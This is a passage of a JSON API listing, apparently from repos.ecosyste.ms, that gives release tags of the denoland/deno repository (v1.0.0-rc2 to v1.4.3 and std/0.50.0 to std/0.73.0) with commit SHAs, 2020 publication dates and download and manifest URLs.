2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.